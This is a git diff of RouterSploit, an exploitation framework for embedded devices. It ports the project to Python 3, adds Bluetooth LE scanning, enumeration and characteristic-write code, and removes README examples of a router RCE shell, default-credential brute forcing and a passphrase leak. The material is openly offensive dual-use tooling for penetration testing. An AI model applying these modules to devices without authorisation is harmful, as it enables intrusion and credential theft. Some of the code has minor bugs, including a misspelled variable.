diff --git a/.gitignore b/.gitignore index 358d51529..569a3bf9c 100644 --- a/.gitignore +++ b/.gitignore @@ -20,7 +20,6 @@ dist/ downloads/ eggs/ .eggs/ -lib/ lib64/ parts/ sdist/ @@ -45,6 +44,7 @@ htmlcov/ .coverage .coverage.* .cache +.pytest_cache nosetests.xml coverage.xml *,cover @@ -71,3 +71,7 @@ venv/ # macOS .DS_Store .DS_Store? + +# vim +*.swp +*.swo diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index 6449d5071..000000000 --- a/.travis.yml +++ /dev/null @@ -1,16 +0,0 @@ -language: python - -matrix: - include: - - os: linux - python: 2.7 - - - os: osx - language: generic - env: PYTHON_VERSION=2.7.13 - -install: - - "./.travis/install.sh" - -script: - - "./.travis/run.sh" \ No newline at end of file diff --git a/.travis/install.sh b/.travis/install.sh deleted file mode 100755 index 0cb44dd7f..000000000 --- a/.travis/install.sh +++ /dev/null @@ -1,24 +0,0 @@ -#!/bin/bash - -set -e -set -x - -if [[ "$(uname -s)" == 'Darwin' ]]; then - sw_vers - - git clone --depth 1 https://github.com/yyuu/pyenv.git ~/.pyenv - PYENV_ROOT="$HOME/.pyenv" - PATH="$PYENV_ROOT/bin:$PATH" - eval "$(pyenv init -)" - - pyenv install $PYTHON_VERSION - pyenv global $PYTHON_VERSION - pyenv rehash - - pip install --user --upgrade pip==9.0.3 - pip install --user virtualenv - python -m virtualenv ~/.venv - source ~/.venv/bin/activate -fi - -pip install -r requirements-dev.txt diff --git a/.travis/run.sh b/.travis/run.sh deleted file mode 100755 index 0ff94ab67..000000000 --- a/.travis/run.sh +++ /dev/null @@ -1,13 +0,0 @@ -#!/bin/bash - -set -e -set -x - -if [[ "$(uname -s)" == "Darwin" ]]; then - PYENV_ROOT="$HOME/.pyenv" - PATH="$PYENV_ROOT/bin:$PATH" - eval "$(pyenv init -)" - source ~/.venv/bin/activate -fi - -make lint tests \ No newline at end of file diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 65a494f63..e40918d8a 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -21,11 +21,13 @@ It is hard to test modules in all possible scenarios. If you would like to help: 1. Check what device you have - identify vendor and version. 2. Check if routersploit contains exploits for the device you posses. 3. If exploit does not work but it should, check "show info" for more information. References should provide you with links to proof of concept exploits. + Example: ``` References: - https://www.exploit-db.com/exploits/24975/ ``` + 4. Try to use proof of concept exploit and check if it works properly. If it does, feel free to create new issue bug with explanation that the routersploit's module does not work properly. ## Development diff --git a/Dockerfile b/Dockerfile index be6b9d382..e0d05b25e 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,9 +1,9 @@ -FROM python:2.7 +FROM python:3.6 COPY requirements.txt /tmp/requirements.txt -RUN pip install -r /tmp/requirements.txt +RUN python -m pip install -r /tmp/requirements.txt WORKDIR /routersploit COPY . . -CMD ["python", "rsf.py"] \ No newline at end of file +CMD ["python", "rsf.py"] diff --git a/Makefile b/Makefile index a577a77e7..fae5f7f6b 100644 --- a/Makefile +++ b/Makefile @@ -11,7 +11,7 @@ run: docker run -it --rm $(RSF_IMAGE) lint: - flake8 --exclude=__init__.py --ignore=$(FLAKE8_IGNORED_RULES) tests $(MODULES) + flake8 --exclude=__init__.py --ignore=$(FLAKE8_IGNORED_RULES) $(MODULES) tests: clean ifeq ($(MODULES), routersploit) diff --git a/README.md b/README.md index 3bb7bc9a6..88584c557 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,6 @@ -# RouterSploit - Router Exploitation Framework +# RouterSploit - Exploitation Framework for Embedded Devices -[![Python 2.7](https://img.shields.io/badge/Python-2.7-yellow.svg)](http://www.python.org/download/) -[![Build Status](https://travis-ci.org/reverse-shell/routersploit.svg?branch=master)](https://travis-ci.org/reverse-shell/routersploit) -[![Join the chat at https://gitter.im/reverse-shell/routersploit](https://badges.gitter.im/reverse-shell/routersploit.svg)](https://gitter.im/reverse-shell/routersploit?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) +[![Python 3.6](https://img.shields.io/badge/Python-3.6-yellow.svg)](http://www.python.org/download/) The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. @@ -10,304 +8,87 @@ The RouterSploit Framework is an open-source exploitation framework dedicated to It consists of various modules that aids penetration testing operations: -- exploits - modules that take advantage of identified vulnerabilities -- creds - modules designed to test credentials against network services -- scanners - modules that check if a target is vulnerable to any exploit +* exploits - modules that take advantage of identified vulnerabilities +* creds - modules designed to test credentials against network services +* scanners - modules that check if a target is vulnerable to any exploit +* payloads - modules that are responsible for generating payloads for various architectures and injection points +* generic - modules that perform generic attacks # Installation ## Requirements +Required: +* future * requests * paramiko -* beautifulsoup4 * pysnmp +* pycrypto + +Optional: +* bluepy - bluetooth low energy + +## Installation on Kali Linux + +``` +apt-get install python3-pip +git clone https://www.github.com/threat9/routersploit +cd routersploit +python3 -m pip install -r requirements.txt +python3 rsf.py +``` + +Bluetooth Low Energy support: +``` +apt-get install libglib2.0-dev +python3 -m pip install bluepy +python3 rsf.py +``` + +## Installation on Ubuntu 18.04 & 17.10 + +``` +sudo add-apt-repository universe +sudo apt-get install git python3-pip +git clone https://www.github.com/threat9/routersploit +python3 -m pip install -r requirements +python3 rsf.py +``` + +Bluetooth Low Energy support: +``` +apt-get install libglib2.0-dev +python3 -m pip install bluepy +python3 rsf.py +``` -## Installation on Kali - - git clone https://github.com/threat9/routersploit - cd routersploit - ./rsf.py - -## Installation on Ubuntu 16.04 - - sudo apt-get install python-dev python-pip libncurses5-dev git - git clone https://github.com/threat9/routersploit - cd routersploit - sudo pip install -r requirements.txt - ./rsf.py - -## Installation on Centos 7 - - sudo yum install python-devel python2-pip ncurses-devel git - git clone https://github.com/threat9/routersploit - cd routersploit - pip install -r requirements.txt - ./rsf.py - -## Installation on OpenSUSE Tumbleweed - - sudo zypper install python-devel python2-pip ncurses-devel git-core - git clone https://github.com/threat9/routersploit - cd routersploit - sudo pip install -r requirements.txt - ./rsf.py ## Installation on OSX - git clone https://github.com/threat9/routersploit - cd routersploit - sudo easy_install pip - sudo pip install -r requirements.txt - ./rsf.py +``` +git clone https://www.github.com/threat9/routersploit +cd routersploit +sudo python3 -m pip install -r requirements.txt +python3 rsf.py +``` ## Running on Docker - git clone https://github.com/threat9/routersploit - cd routersploit - docker build -t routersploit . - docker run -it --rm routersploit +``` +git clone https://www.github.com/threat9/routersploit +cd routersploit +docker build -t routersploit . +docker run -it --rm routersploit +``` # Update Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day. - cd routersploit - git pull - -# Usage - - root@kalidev:~/git/routersploit# ./rsf.py - ______ _ _____ _ _ _ - | ___ \ | | / ___| | | (_) | - | |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_ - | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| - | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ - \_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__| - | | - Router Exploitation Framework |_| - - Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz) - Codename : Wildest Dreams - Version : 1.0.0 - - rsf > - -## 1. Exploits - -### Pick the module - - rsf > use exploits/ - exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ - rsf > use exploits/dlink/dir_300_600_rce - rsf (D-LINK DIR-300 & DIR-600 RCE) > - -You can use the tab key for completion. - -### Options - -Display module options: - - rsf (D-LINK DIR-300 & DIR-600 RCE) > show options - - Target options: - - - Name Current settings Description - ---- ---------------- ----------- - target Target address e.g. http://192.168.1.1 - port 80 Target Port - -Set options: - - rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1 - [+] {'target': 'http://192.168.1.1'} - -### Run module - -You can exploit the target by issuing the 'run' or 'exploit' command: - - rsf (D-LINK DIR-300 & DIR-600 RCE) > run - [+] Target is vulnerable - [*] Invoking command loop... - cmd > whoami - root - -It is also possible to check if the target is vulnerable to particular exploit: - - rsf (D-LINK DIR-300 & DIR-600 RCE) > check - [+] Target is vulnerable - -### Info - -Display information about exploit: - - rsf (D-LINK DIR-300 & DIR-600 RCE) > show info - - Name: - D-LINK DIR-300 & DIR-600 RCE - - Description: - Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges. - - Devices: - - D-Link DIR 300 - - D-Link DIR 600 - - Authors: - - Michael Messner # vulnerability discovery - - Marcin Bury # routersploit module - - References: - - http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router - - http://www.s3cur1ty.de/home-network-horror-days - - http://www.s3cur1ty.de/m1adv2013-003 - -## 2. Creds - -### Pick module - -Modules located in the `creds/` directory allow running dictionary attacks against various network services. - -The following services are currently supported: - -- ftp -- ssh -- telnet -- http basic auth -- http digest auth -- http form auth -- snmp - -Every service has been divided into two modules: - -- default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. The module can be quickly used and in matter of seconds can verify if the device uses default credentials. -- bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against a specified account or list of accounts. It takes two parameters: login and password. These values can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt). - -Console: - - rsf > use creds/ - creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default - creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce - rsf > use creds/ssh_default - rsf (SSH Default Creds) > - -### Options - - rsf (SSH Default Creds) > show options - - Target options: - - Name Current settings Description - ---- ---------------- ----------- - target Target IP address - port 22 Target port - - - Module options: - - Name Current settings Description - ---- ---------------- ----------- - threads 8 Numbers of threads - defaults file:///root/git/routersploit/routersploit/wordlists/defaults.txt User:Pass or file with default credentials (file://) - - -Set target: - - rsf (SSH Default Creds) > set target 192.168.1.53 - [+] {'target': '192.168.1.53'} - - -### Run module - - rsf (SSH Default Creds) > run - [*] Running module... - [*] worker-0 process is starting... - [*] worker-1 process is starting... - [*] worker-2 process is starting... - [*] worker-3 process is starting... - [*] worker-4 process is starting... - [*] worker-5 process is starting... - [*] worker-6 process is starting... - [*] worker-7 process is starting... - [-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000' - [-] worker-1 Authentication failed. Username: '1234' Password: '1234' - [-] worker-0 Authentication failed. Username: '1111' Password: '1111' - [-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP' - [-] worker-3 Authentication failed. Username: '266344' Password: '266344' - [-] worker-2 Authentication failed. Username: '1502' Password: '1502' - - (..) - - Elapsed time: 38.9181981087 seconds - [+] Credentials found! - - Login Password - ----- -------- - admin 1234 - - rsf (SSH Default Creds) > - -## 3. Scanners - -Scanners allow you to quickly verify if the target is vulnerable to any exploits. - -### Pick module - - rsf > use scanners/dlink_scan - rsf (D-Link Scanner) > show options - - -### Options - - Target options: - - Name Current settings Description - ---- ---------------- ----------- - target Target address e.g. http://192.168.1.1 - port 80 Target port - -Set target: - - rsf (D-Link Scanner) > set target 192.168.1.1 - [+] {'target': '192.168.1.1'} - -### Run module - - rsf (D-Link Scanner) > run - [+] exploits/dlink/dwr_932_info_disclosure is vulnerable - [-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable - [-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable - [-] exploits/dlink/dns_320l_327l_rce is not vulnerable - [-] exploits/dlink/dir_645_password_disclosure is not vulnerable - [-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable - [-] exploits/dlink/dir_300_600_rce is not vulnerable - - [+] Device is vulnerable! - - exploits/dlink/dwr_932_info_disclosure - -It has been verified that the target is vulnerable to dwr\_932\_info\_disclosure exploit. Now use the proper module and exploit target. - - rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure - rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1 - [+] {'target': '192.168.1.1'} - rsf (D-Link DWR-932 Info Disclosure) > exploit - [*] Running module... - [*] Decoding JSON value - [+] Exploit success - - Parameter Value - --------- ----- - get_wps_enable 0 - wifi_AP1_enable 1 - get_client_list 9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0 - wifi_AP1_ssid dlink-DWR-932 - get_mac_address c4:00:f5:00:ec:40 - wifi_AP1_security_mode 3208,8 - wifi_AP1_hidden 0 - get_mac_filter_switch 0 - wifi_AP1_passphrase MyPaSsPhRaSe - get_wps_mode 0 +``` +cd routersploit +git pull +``` # License diff --git a/requirements-dev.txt b/requirements-dev.txt deleted file mode 100644 index 3f7a1f5a5..000000000 --- a/requirements-dev.txt +++ /dev/null @@ -1,8 +0,0 @@ -future>=0.16.0 -requests>=2.9.1 -paramiko>=1.16.0 -beautifulsoup4>=4.4.1 -pysnmp>=4.3.2 -pexpect -mock -flake8 diff --git a/requirements.txt b/requirements.txt index 80b26e7eb..15cdf1d32 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,5 @@ +future>=0.16.0 requests>=2.9.1 paramiko>=1.16.0 -beautifulsoup4>=4.4.1 pysnmp>=4.3.2 +pycrypto==2.6.1 diff --git a/routersploit/__init__.py b/routersploit/__init__.py index 59fdc63f2..e69de29bb 100644 --- a/routersploit/__init__.py +++ b/routersploit/__init__.py @@ -1,23 +0,0 @@ -from routersploit.utils import ( - print_error, - print_status, - print_success, - print_table, - print_info, - sanitize_url, - LockedIterator, - random_text, - http_request, - boolify, - mute, - multi, - index_modules, - ssh_interactive, - tokenize, -) - -from routersploit import exploits -from routersploit import payloads -from routersploit import wordlists -from routersploit import validators -from routersploit.shell import shell diff --git a/routersploit/modules/exploits/cameras/videoiq/__init__.py b/routersploit/core/__init__.py similarity index 100% rename from routersploit/modules/exploits/cameras/videoiq/__init__.py rename to routersploit/core/__init__.py diff --git a/routersploit/modules/payloads/generic/__init__.py b/routersploit/core/bluetooth/__init__.py similarity index 100% rename from routersploit/modules/payloads/generic/__init__.py rename to routersploit/core/bluetooth/__init__.py diff --git a/routersploit/core/bluetooth/btle/__init__.py b/routersploit/core/bluetooth/btle/__init__.py new file mode 100644 index 000000000..ddfcb4b94 --- /dev/null +++ b/routersploit/core/bluetooth/btle/__init__.py @@ -0,0 +1,7 @@ +from .btle_device import ( + Device +) +from .btle_scanner import ( + BTLEScanner, + ScanDelegate +) diff --git a/routersploit/core/bluetooth/btle/btle_device.py b/routersploit/core/bluetooth/btle/btle_device.py new file mode 100644 index 000000000..446897f07 --- /dev/null +++ b/routersploit/core/bluetooth/btle/btle_device.py @@ -0,0 +1,393 @@ +import struct +from bluepy.btle import ( + Peripheral, + ScanEntry, + AssignedNumbers +) +from routersploit.core.exploit.printer import ( + print_table, + print_success, + print_status, + print_error, + color_blue, + color_green, + color_red +) +from routersploit.core.exploit.utils import ( + lookup_vendor +) + + +class Device(ScanEntry): + """ Single discovered Bluetooth Low Energy device """ + + def __init__(self, addr, iface): + ScanEntry.__init__(self, addr, iface) + + self.vendor = None + self.data = [] + + def _update(self, resp): + ScanEntry._update(self, resp) + + if self.addrType is "random": + self.vendor = "None (Random MAC address)" + else: + self.vendor = lookup_vendor(self.addr) + + if self.scanData: + self.data = self._get_data(self.getScanData()) + + def print_info(self): + headers = (color_blue("{} ({} dBm)").format(self.addr, self.rssi), "") + if self.connectable: + allow_connection = color_green(str(self.connectable)) + else: + allow_connection = color_red(str(self.connectable)) + + data = [ + ("Vendor", self.vendor), + ("Allow Connections", allow_connection), + ] + + for d in self.data: + data.append((d[0], d[1])) + + print_table(headers, *data, max_column_length=70, extra_fill=3) + + def print_services(self): + headers = ("Handles", "Service > Characteristics", "Properties", "Data") + services = self.enumerate_services() + + if services: + print_table(headers, *services, max_column_length=70, extra_fill=3) + + def enumerate_services(self): + print_status("Starting enumerating {} ({} dBm) ...".format(self.addr, self.rssi)) + + try: + dev = Peripheral(self, self.addrType) + + services = sorted(dev.services, key=lambda s: s.hndStart) + + data = [] + for service in services: + if service.hndStart == service.hndEnd: + continue + + data.append([ + "{:04x} -> {:04x}".format(service.hndStart, service.hndEnd), + self._get_svc_description(service), + "", + "", + ]) + + for _, char in enumerate(service.getCharacteristics()): + desc = self._get_char_description(char) + props = char.propertiesToString() + hnd = char.getHandle() + value = self._get_char(char, props) + + data.append([ + "{:04x}".format(hnd), desc, props, value + ]) + + dev.disconnect() + + return data + + except Exception as err: + print_error(err) + + try: + dev.disconnect() + except Exception as err: + print_error(err) + + return None + + def write(self, characteristic, data): + try: + dev = Peripheral(self, self.addrType) + + services = sorted(dev.services, key=lambda s: s.hndStart) + + print_status("Searching for characteristic {}".format(characteristic)) + char = None + for service in services: + if char is not None: + break + + for _, c in enumerate(service.getCharacteristics()): + if str(c.uuid) == characteristic: + char =c + break + + if char: + if "WRITE" in char.propertiesToString(): + print_success("Sending {} bytes...".format(len(data))) + + wwrflag = False + + if "NO RESPONSE" in char.propertiesToString(): + wwrflag = True + + try: + char.write(data, wwrflag) + print_success("Data sent") + except Exception as err: + print_error("Error: {}".format(err)) + + else: + print_error("Not writable") + + dev.disconnect() + + except Exception as err: + print_error(err) + + try: + dev.disconnect() + except Exception: + pass + + return None + + def _get_data(self, scan_data): + data = [] + for (tag, desc, val) in scan_data: + if desc == "Flags": + data.append(("Flags", self._get_flags(val))) + + elif tag in [8, 9]: + try: + data.append((desc, val)) + except UnicodeEncodeError: + data.append((desc, repr(val))) + + else: + data.append((desc, val)) + + return data + + def _get_flags(self, data): + bits = [] + flags = int(data, 16) + + if self._is_bit_set(flags, 0): + bits.append("LE Limited Discoverable") + + if self._is_bit_set(flags, 1): + bits.append("LE General Discoverable") + + if self._is_bit_set(flags, 2): + bits.append("BR/EDR") + + if self._is_bit_set(flags, 3): + bits.append("LE + BR/EDR Controller Mode") + + if self._is_bit_set(flags, 4): + bits.append("LE + BR/EDR Host Mode") + + return ", ".join(bits) + + def _is_bit_set(self, byteval, idx): + return ((byteval & (1 << idx)) != 0) + + def _get_svc_description(self, service): + uuid_name = service.uuid.getCommonName() + + if uuid_name and uuid_name != str(service.uuid): + return "{} ({})".format(color_green(uuid_name), service.uuid) + + return str(service.uuid) + + def _get_char_description(self, char): + char_name = char.uuid.getCommonName() + if char_name and char_name != str(char.uuid): + return " {} ({})".format(color_green(char_name), char.uuid) + + return " {}".format(char.uuid) + + def _get_char(self, char, props): + string = "" + if "READ" in props and "INDICATE" not in props: + try: + data = char.read() + + if char.uuid == AssignedNumbers.appearance: + string = self._get_appearance(data) + else: + try: + string = color_blue(repr(data.decode("utf-8"))) + except Exception: + stirng = repr(data) + + except Exception: + pass + + return string + + def _get_appearance(self, data): + appearance = { + 0: "Unknown", + 64: "Generic Phone", + 128: "Generic Computer", + 192: "Generic Watch", + 193: "Watch: Sports Watch", + 256: "Generic Clock", + 320: "Generic Display", + 384: "Generic Remote Control", + 448: "Generic Eye-glasses", + 512: "Generic Tag", + 576: "Generic Keyring", + 640: "Generic Media Player", + 704: "Generic Barcode Scanner", + 768: "Generic Thermometer", + 769: "Thermometer: Ear", + 832: "Generic Heart rate Sensor", + 833: "Heart Rate Sensor: Heart Rate Belt", + 896: "Generic Blood Pressure", + 897: "Blood Pressure: Arm", + 898: "Blood Pressure: Wrist", + 960: "Human Interface Device (HID)", + 961: "Keyboard", + 962: "Mouse", + 963: "Joystick", + 964: "Gamepad", + 965: "Digitizer Tablet", + 966: "Card Reader", + 967: "Digital Pen", + 968: "Barcode Scanner", + 1024: "Generic Glucose Meter", + 1088: "Generic: Running Walking Sensor", + 1089: "Running Walking Sensor: In-Shoe", + 1090: "Running Walking Sensor: On-Shoe", + 1091: "Running Walking Sensor: On-Hip", + 1152: "Generic: Cycling", + 1153: "Cycling: Cycling Computer", + 1154: "Cycling: Speed Sensor", + 1155: "Cycling: Cadence Sensor", + 1156: "Cycling: Power Sensor", + 1157: "Cycling: Speed and Cadence Sensor", + 1216: "Generic Control Device", + 1217: "Switch", + 1218: "Multi-switch", + 1219: "Button", + 1220: "Slider", + 1221: "Rotary", + 1222: "Touch-panel", + 1280: "Generic Network Device", + 1281: "Access Point", + 1344: "Generic Sensor", + 1345: "Motion Sensor", + 1346: "Air Quality Sensor", + 1347: "Temperature Sensor", + 1348: "Humidity Sensor", + 1349: "Leak Sensor", + 1350: "Smoke Sensor", + 1351: "Occupancy Sensor", + 1352: "Contact Sensor", + 1353: "Carbon Monoxide Sensor", + 1354: "Carbon Dioxide Sensor", + 1355: "Ambient Light Sensor", + 1356: "Energy Sensor", + 1357: "Color Light Sensor", + 1358: "Rain Sensor", + 1359: "Fire Sensor", + 1360: "Wind Sensor", + 1361: "Proximity Sensor", + 1362: "Multi-Sensor", + 1408: "Generic Light Fixtures", + 1409: "Wall Light", + 1410: "Ceiling Light", + 1411: "Floor Light", + 1412: "Cabinet Light", + 1413: "Desk Light", + 1414: "Troffer Light", + 1415: "Pendant Light", + 1416: "In-ground Light", + 1417: "Flood Light", + 1418: "Underwater Light", + 1419: "Bollard with Light", + 1420: "Pathway Light", + 1421: "Garden Light", + 1422: "Pole-top Light", + 1423: "Spotlight", + 1424: "Linear Light", + 1425: "Street Light", + 1426: "Shelves Light", + 1427: "High-bay / Low-bay Light", + 1428: "Emergency Exit Light", + 1472: "Generic Fan", + 1473: "Ceiling Fan", + 1474: "Axial Fan", + 1475: "Exhaust Fan", + 1476: "Pedestal Fan", + 1477: "Desk Fan", + 1478: "Wall Fan", + 1536: "Generic HVAC", + 1537: "Thermostat", + 1600: "Generic Air Conditioning", + 1664: "Generic Humidifier", + 1728: "Generic Heating", + 1729: "Radiator", + 1730: "Boiler", + 1731: "Heat Pump", + 1732: "Infrared Heater", + 1733: "Radiant Panel Heater", + 1734: "Fan Heater", + 1735: "Air Curtain", + 1792: "Generic Access Control", + 1793: "Access Door", + 1794: "Garage Door", + 1795: "Emergency Exit Door", + 1796: "Access Lock", + 1797: "Elevator", + 1798: "Window", + 1799: "Entrance Gate", + 1856: "Generic Motorized Device", + 1857: "Motorized Gate", + 1858: "Awning", + 1859: "Blinds or Shades", + 1860: "Curtains", + 1861: "Screen", + 1920: "Generic Power Device", + 1921: "Power Outlet", + 1922: "Power Strip", + 1923: "Plug", + 1924: "Power Supply", + 1925: "LED Driver", + 1926: "Fluorescent Lamp Gear", + 1927: "HID Lamp Gear", + 1984: "Generic Light Source", + 1985: "Incandescent Light Bulb", + 1986: "LED Bulb", + 1987: "HID Lamp", + 1988: "Fluorescent Lamp", + 1989: "LED Array", + 1990: "Multi-Color LED Array", + 3136: "Generic: Pulse Oximeter", + 3137: "Fingertip", + 3138: "Wrist Worn", + 3200: "Generic: Weight Scale", + 3264: "Generic", + 3265: "Powered Wheelchair", + 3266: "Mobility Scooter", + 3328: "Generic", + 5184: "Generic: Outdoor Sports Activity", + 5185: "Location Display Device", + 5186: "Location and Navigation Display Device", + 5187: "Location Pod", + 5188: "Location and Navigation Pod", + } + + try: + code = struct.unpack("h", data)[0] + + if code in appearance.keys(): + return color_green(appearance[code]) + except Exception: + pass + + return repr(data) diff --git a/routersploit/core/bluetooth/btle/btle_scanner.py b/routersploit/core/bluetooth/btle/btle_scanner.py new file mode 100644 index 000000000..590017cd4 --- /dev/null +++ b/routersploit/core/bluetooth/btle/btle_scanner.py @@ -0,0 +1,74 @@ +import time +import binascii +from bluepy.btle import Scanner, DefaultDelegate +from .btle_device import Device + + +class BTLEScanner(Scanner): + """ Bluetooth Low Energy Scanner """ + + def __init__(self, mac=None, iface=0): + Scanner.__init__(self, iface) + self.mac = mac + + def _decode_address(self, resp): + addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8") + return ":".join([addr[i : i + 2] for i in range(0, 12, 2)]) + + def _find_or_create(self, addr): + if addr in self.scanned: + dev = self.scanned[addr] + else: + dev = Device(addr, self.iface) + self.scanned[addr] = dev + + return dev + + def process(self, timeout=10.0): + start = time.time() + + while True: + if timeout: + remain = start + timeout - time.time() + if remain <= 0.0: + break + else: + remain = None + + resp = self._waitResp(["scan", "stat"], remain) + if resp is None: + break + + respType = resp["rsp"][0] + + if respType == "stat": + if resp["state"][0] == "disc": + self._mgmtCmd("scan") + + elif respType == "scan": + addr = self._decode_address(resp) + + if not self.mac or addr == self.mac: + dev = self._find_or_create(addr) + + newData = dev._update(resp) + + if self.delegate: + self.delegate.handleDiscovery(dev, (dev.updateCount <= 1), newData) + + if self.mac and dev.addr == self.mac: + break + +class ScanDelegate(DefaultDelegate): + def __init__(self, options): + DefaultDelegate.__init__(self) + self.options = options + + def handleDiscovery(self, dev, isNewDev, isNewData): + if not isNewDev: + return + elif self.options.mac and dev.addr != self.options.mac: + return + + if self.options.buffering: + dev.print_info() diff --git a/routersploit/core/bluetooth/btle_client.py b/routersploit/core/bluetooth/btle_client.py new file mode 100644 index 000000000..f17546eb6 --- /dev/null +++ b/routersploit/core/bluetooth/btle_client.py @@ -0,0 +1,52 @@ +from routersploit.core.exploit.exploit import Exploit +from routersploit.core.exploit.option import OptInteger +from routersploit.core.exploit.printer import ( + print_error, + print_status +) +from routersploit.core.bluetooth.btle import ( + ScanDelegate, + BTLEScanner +) + + +class Options: + """ Options used by the scanner """ + + def __init__(self, buffering, mac, enum_services): + self.buffering = buffering + self.mac = mac + self.enum_services = enum_services + + +class BTLEClient(Exploit): + """ Bluetooth Low Energy Client implementation """ + + scan_time = OptInteger(10, "Number of seconds to scan for") + buffering = False + enum_services = False + + def btle_scan(self, mac=None): + """ Scans for Bluetooth Low Energy devices """ + + options = Options( + self.buffering, + mac, + self.enum_services + ) + + scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options)) + + if options.mac: + print_status("Scanning BTLE device...") + else: + print_status("Scanning for BTLE devices...") + + devices = [] + try: + devices = [res for res in scanner.scan(self.scan_time)] + except Exception as err: + print_error("Error: {}".format(err)) + print_error("Check if your bluetooth hardware is connected") + + return devices diff --git a/routersploit/core/exploit/__init__.py b/routersploit/core/exploit/__init__.py new file mode 100644 index 000000000..c70935430 --- /dev/null +++ b/routersploit/core/exploit/__init__.py @@ -0,0 +1,28 @@ +from routersploit.core.exploit.exploit import ( + Exploit, + multi, + mute, + LockedIterator, +) + +from routersploit.core.exploit.option import ( + OptIP, + OptPort, + OptInteger, + OptFloat, + OptBool, + OptString, + OptMAC, + OptWordlist, +) + +from routersploit.core.exploit.printer import ( + print_info, + print_status, + print_success, + print_error, + print_table, +) + +import routersploit.core.exploit.utils +from routersploit.core.exploit.shell import shell diff --git a/routersploit/exceptions.py b/routersploit/core/exploit/exceptions.py similarity index 65% rename from routersploit/exceptions.py rename to routersploit/core/exploit/exceptions.py index 24264246f..649810078 100644 --- a/routersploit/exceptions.py +++ b/routersploit/core/exploit/exceptions.py @@ -1,13 +1,6 @@ -import logging - - -LOGGER = logging.getLogger(__name__) - - class RoutersploitException(Exception): - def __init__(self, msg=''): + def __init__(self, msg=""): super(RoutersploitException, self).__init__(msg) - LOGGER.exception(self) class OptionValidationError(RoutersploitException): diff --git a/routersploit/core/exploit/exploit.py b/routersploit/core/exploit/exploit.py new file mode 100644 index 000000000..f6e894b1c --- /dev/null +++ b/routersploit/core/exploit/exploit.py @@ -0,0 +1,208 @@ +import os +import threading +import time +import concurrent.futures +from future.utils import with_metaclass, iteritems +from itertools import chain +from functools import wraps + +from routersploit.core.exploit.printer import ( + print_status, + print_error, + thread_output_stream, +) +from routersploit.core.exploit.option import Option + +GLOBAL_OPTS = {} + + +class ExploitOptionsAggregator(type): + """ Metaclass for exploit base class. + + Metaclass is aggregating all possible Attributes that user can set + for tab completion purposes. + """ + + def __new__(cls, name, bases, attrs): + try: + base_exploit_attributes = chain([base.exploit_attributes for base in bases]) + except AttributeError: + attrs["exploit_attributes"] = {} + else: + attrs["exploit_attributes"] = {k: v for d in base_exploit_attributes for k, v in iteritems(d)} + + for key, value in iteritems(attrs): + if isinstance(value, Option): + value.label = key + attrs["exploit_attributes"].update({key: [value.display_value, value.description]}) + elif key == "__info__": + attrs["_{}{}".format(name, key)] = value + del attrs[key] + elif key in attrs["exploit_attributes"]: # removing exploit_attribtue that was overwritten + del attrs["exploit_attributes"][key] # in the child and is not an Option() instance + + return super(ExploitOptionsAggregator, cls).__new__(cls, name, bases, attrs) + + +class BaseExploit(with_metaclass(ExploitOptionsAggregator, object)): + @property + def options(self): + """ Returns list of options that user can set. + + Returns list of options aggregated by + ExploitionOptionsAggegator metaclass that user can set. + + :return: list of options that user can set + """ + + return list(self.exploit_attributes.keys()) + + def __str__(self): + return self.__module__.split('.', 2).pop().replace('.', os.sep) + + +class Exploit(BaseExploit): + """ Base class for exploits """ + + target_protocol = "custom" + + + def run(self): + raise NotImplementedError("You have to define your own 'run' method.") + + def check(self): + raise NotImplementedError("You have to define your own 'check' method.") + + def run_threads(self, threads_number, target_function, *args, **kwargs): + threads = [] + threads_running = threading.Event() + threads_running.set() + + for thread_id in range(int(threads_number)): + thread = threading.Thread( + target=target_function, + args=chain((threads_running,), args), + kwargs=kwargs, + name="thread-{}".format(thread_id), + ) + threads.append(thread) + + print_status("{} thread is starting...".format(thread.name)) + thread.start() + + start = time.time() + try: + while thread.isAlive(): + thread.join(1) + + except KeyboardInterrupt: + threads_running.clear() + + for thread in threads: + thread.join() + print_status("{} thread is terminated.".format(thread.name)) + + print_status("Elapsed time: {} seconds".format(time.time() - start)) + + +def multi(fn): + """ Decorator for exploit.Exploit class + + Decorator that allows to feed exploit using text file containing + multiple targets definition. Decorated function will be executed + as many times as there is targets in the feed file. + + 